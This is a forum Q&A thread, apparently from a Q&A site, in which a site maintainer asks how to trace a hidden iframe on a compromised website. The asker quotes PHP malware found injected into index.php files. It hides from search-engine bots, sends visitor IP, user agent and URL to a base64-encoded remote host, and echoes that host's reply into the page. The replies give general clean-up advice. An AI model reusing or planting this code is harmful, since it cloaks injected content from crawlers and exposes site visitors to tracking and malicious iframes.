Malicous Iframe appearing on website

Question

One of the websites which I look after appears to have been compromised. However I am still trying to locate the source of the problem.

A hidden iframe appears on the page, however it only appears about 10% of the time when you visit the website. I have checked the actual files in question and there is has been no such iframe code added to them, which makes me think that the server itself hasn't been compromised and this is some sort of XSS attack? Also the server also hosts various other websites which don't appear to be effected.

Where would be best place to start in terms of locating and fixing this issue. Ideally I would like to wipe the server and start again but I don't have that option at present as I don't fully control this particular server.

I have done some more digging and have found the following piece of code appearing in various index.php files. Don't suppose anyone recognizes it?

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            @$stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

Your hacker script location, when you base64_decode the string: http://browserglobalstat.com/statD/stat.php — CloudWeavers, Apr 08 '13 at 21:39

score 2 · Answer 1 · answered Mar 21 '13 at 11:52

First thing would be to wipe everything (or your full vhost) and restart from known good backup. Seriously. A compromised system is... compromised.

However, for the sake of investigation, I would suggest you start by providing what web server is your host using (apache?, nginx? lighttpd? IIS?) and the operating system.

By experience, I would say you were using an out of date framework (ie: wordpress, django, or any of those PHP bulletin board) and someone exploited a permission issues to have some remote code execute a modification to one of your .htaccess ; but this is really a random guess until you start providing a bit more info.

The website in question doesn't use any frameworks other than a few JQuery plug ins. The server is a LAMP setup. — cosmicsafari, Mar 21 '13 at 12:43

Malicous Iframe appearing on website

1 Answers1